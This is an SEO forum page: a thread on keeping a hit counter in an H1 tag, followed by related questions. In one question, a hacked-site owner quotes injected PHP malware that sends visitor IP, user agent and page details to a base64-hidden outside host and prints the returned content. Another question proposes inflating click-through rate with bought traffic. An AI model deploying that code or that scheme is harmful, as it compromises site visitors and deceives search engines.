Will hits in the H1 improve ranking through regular crawling?
-
Hello!
I was wondering if it's a good idea to keep the "Hits" counter in the H1?
http://www.ibremarketing.com/item/netapp-e5400-storage-system.html
Will Google come back regularly to check for the update (treating it as new information, if I understand correctly), or will it dislike having to come back just for a hit-count update?
Since I have very good results on this part of the website, I don't want to take any risk.
Thanks a lot!
-
You're right
-
The issue I have is that I have few visits on each page, so it's going to be very difficult to see if there is any change.
** Even so - you can still track the rankings...
-
Hmm... since it's going quite well now, I think I'll leave it as it is.
The issue I have is that I have few visits on each page, so it's going to be very difficult to see if there is any change.
That's why I was looking for some input on our favorite forum.
Thanks for your help!
-
Hi,
So is it better to remove the hits from the H1?
** From the outside I would say yes. However, again, I would say you should test on a few "test subject" pages and then decide - there is always room for improvement, and you might find that it has some benefits.
Cheers.
-
Hello,
Yes, you're right. So is it better to remove the hits from the H1?
-
Hi,
Maybe I am wrong, but the sample you've provided could be "evergreen content" (content that is the same now as it will be in two years) rather than content based on queries that deserve freshness. I would say it's the evergreen kind, and if so, Google won't come back regularly to check whether updates have been made - crawl frequency is also based on the page's change rate in its first days/weeks/months of life.
Maybe I got your question wrong, but the basic idea is to play it safe: don't go into really tiny micromanagement, and always test on a few pages first; if it works, go wide.
Not really helpful, I know.
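For illustration, the change being discussed is simply moving the counter out of the heading element so the H1 text stays stable between crawls. A hypothetical sketch of the item-page template (the function name, markup, and values are assumptions, not the actual site's code):

```python
# Hypothetical template fragment: the hit counter is rendered in its own
# element instead of inside the <h1>, so the heading text does not change
# on every page view. Names and markup are illustrative assumptions.
def render_header(title: str, hits: int) -> str:
    return (
        f"<h1>{title}</h1>\n"
        f'<span class="hits">Hits: {hits}</span>'
    )

print(render_header("NetApp E5400 Storage System", 1245))
```

This keeps the counter visible to users while leaving the heading itself unchanged from crawl to crawl.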
Related Questions
-
How do I stop Googlebot from crawling spammy pages injected by a hacker?
Hello, please help me. One of our websites is under attack by a hacker once again. They have injected spammy URLs and Google is indexing them, but we cannot find these pages on our website - they are all 404 pages. Our website is not secured (no HTTPS) and uses the WordPress CMS. Thanks
White Hat / Black Hat SEO | ShahzadAhmed
-
Besides description and design optimization, is there any other main factor we can influence to get better App Store rankings?
Hi there! I love SEO and cracking the web search engine, but when it comes to other search engines, like YouTube and the App Store, it's an unknown field for me. So I'm diving into App Store Optimization (ASO). This is my question: besides the text and the design in the description of the app, is there any other factor that we can manipulate or influence (such as link building, social media, or alien magic, hehe)? Thanks a lot!
GR.
White Hat / Black Hat SEO | Gaston Riera
-
Still seeing a terrible rank drop after the last algo update?!
I'm still stumped as to why the ranking has gone so poor on a white-hat site (see attached image). As you can see, we had been steadily improving the ranking over the last 6+ months and then got hit with a massive change this month... I can't see any issues, and Moz isn't reporting anything negative that would have such a major effect. The drops weren't subtle - they've all gone into the 50+ section! Any insights into what may have changed in the latest algo update would be appreciated!
White Hat / Black Hat SEO | snowflake74
-
Trying to escape from a Google algorithm ranking drop
In 2010 our website was ranking number 1 for many keywords. We saw a sudden crash a few years ago, and we have since identified that we were hit by many shades of the Panda and Penguin updates, mainly due to low-quality backlinks and poor content (some duplicates).
Since then we have done a major overhaul of our backlink profile. Rankings that went from number 1 for many keywords down to number 60-70 are now placed at around 11 to 18. We have also addressed our duplicate-content issues: we removed all duplicate content, introduced a blog with fresh twice-daily updates in an attempt to gain traffic, and amalgamated many small low-quality pages into larger, higher-quality content pages. We are now mobile friendly with a dynamic site, our site speed is good (around 80), we have switched to HTTPS, and we have upgraded our website for better conversions.
We have looked at the technical side and don't have many major issues, although 404s show up in Google Webmaster Tools for old pages we removed due to duplicate content. We are link building at a pace of around 40 mentions a month - some nofollow, some dofollow, and some unlinked mentions - and we are diversifying links to include branding in addition to target keywords.
We have pretty much exhausted every avenue we can think of, but we cannot jump over to page 1 for any significant keywords we are targeting. Our competitors' websites are not that powerful, and their metrics are similar to ours, if not lower.
1. Please can you advise on anything else we should look at?
2. We are even considering moving to a new domain and 301'ing all pages to it in an attempt to shake off the algorithmic filter (penalties). Has anyone done this? How long would it take to get at least the same rankings for the new domain if we 301 all URLs to it? Do you think it's worth it? We know the risk of doing this, so we wanted to seek some advice first.
3. On the other hand, we have considered that having disavowed so many links (70%) could itself be the cause of the page-two problem; however, we are link building according to Moz and Majestic metric standards with no benefit. Do you think we should increase link building?
Advice is appreciated!
White Hat / Black Hat SEO | Direct_Ram
-
Black hat: raising CTR to get a better rank in Google
We all know that Google uses click-through rate (CTR) as one of its ranking factors. An idea came to my mind, and I would like to see if someone has seen or tried it before. If you search Google for the term "SEO", for example, you will see the moz.com website at rank 3, and if you check the source code you will see that result 3 links to this URL: https://www.google.com.sa/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&cad=rja&uact=8&ved=0CDMQFjAC&url=https%3A%2F%2Fmoz.com%2Fbeginners-guide-to-seo&ei=F-pPVaDZBoSp7Abo_IDYAg&usg=AFQjCNEwiTCgNNNWInUJNibqiJCnlqcYtw That URL will redirect you to moz.com. OK, so what if we used linkbucks.com, or any other cheap targeted-traffic network, and ran a campaign that sends traffic to the URL I showed you? Would that count as traffic from Google, so it increases the CTR from Google?
White Hat / Black Hat SEO | Mohtaref1
-
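As an aside on how those SERP links work: the real destination is carried in the url= query parameter of the google.com/url redirect, which lets Google log the click before sending the browser on. A minimal sketch using only Python's standard library (the redirect URL is abbreviated from the one quoted in the question above):

```python
from urllib.parse import urlparse, parse_qs

# SERP redirect URL from the question above, abbreviated to its key parts.
redirect = ("https://www.google.com.sa/url?sa=t&cd=3"
            "&url=https%3A%2F%2Fmoz.com%2Fbeginners-guide-to-seo")

# parse_qs percent-decodes the values, exposing the real destination.
params = parse_qs(urlparse(redirect).query)
destination = params["url"][0]
print(destination)  # https://moz.com/beginners-guide-to-seo
```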
Site that's 301-redirected is ranking for brand
We own a number of foreign TLD domains for our brand. They are all 301-redirected to our main .com branded domain. One of them is appearing in our branded search results, outranking our main .com page. To be clear, this is despite there being a 301 redirect from it to the .com page. Any ideas on what is going on here?
White Hat / Black Hat SEO | ipancake
-
Website has been hacked - will this hurt ranking?
Today we found out that one of our websites has been hacked and that they put this code in multiple index.php files:
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>
After some searching I found other people mentioning this problem too. They were also saying that it could have an impact on your search rankings. My first question: will this hurt my rankings? My second question: is there something I can do to tell the search engines about the hack so that we don't lose ranking over this?
Grtz, Ard
White Hat / Black Hat SEO | GTGshops
-
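For anyone inspecting a similar injection: the base64 blob in the snippet above hides the attacker's callback endpoint. Decoding it (the encoded string comes straight from the quoted code) reveals where the script phones home:

```python
import base64

# The base64-encoded string from the injected PHP above.
blob = "aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw"

# Decoding exposes the attacker's statistics/callback URL.
callback = base64.b64decode(blob).decode("ascii")
print(callback)  # http://mbrowserstats.com/statH/stat.php
```

Grepping your codebase for base64_decode calls and decoding any literals they hide is a common first step when auditing a compromised PHP install.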
Multiple H1 tags are OK according to my developer. I have my doubts - please advise...
Hi, my very well-known and widely respected developer is using multiple H1 tags - they like using them in their code, and they argue that multiple H1s conform to the HTML5 standard. They are resisting a recode to one H1 tag per page. However, I know this is clearly an issue in Bing, so I don't want to risk it with Google. Any thoughts on whether it's best to avoid multiple H1 tags for Google? Any evidence and reasoning would be great - I can then put that to my developer. Many thanks for your help, Luke
White Hat / Black Hat SEO | McTaggart
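On the multiple-H1 debate above, the first step is usually just auditing how many H1 elements a template actually emits. A small sketch using only Python's standard library (the sample markup is hypothetical):

```python
from html.parser import HTMLParser

# Count <h1> start tags in a page so you can see what a template
# really renders. The sample HTML below is illustrative only.
class H1Counter(HTMLParser):
    def __init__(self):
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "h1":
            self.count += 1

html = "<body><h1>Main</h1><section><h1>Section heading</h1></section></body>"
parser = H1Counter()
parser.feed(html)
print(parser.count)  # 2
```

Running this across a few page templates gives concrete numbers to take back to the developer, whichever way the one-vs-many decision goes.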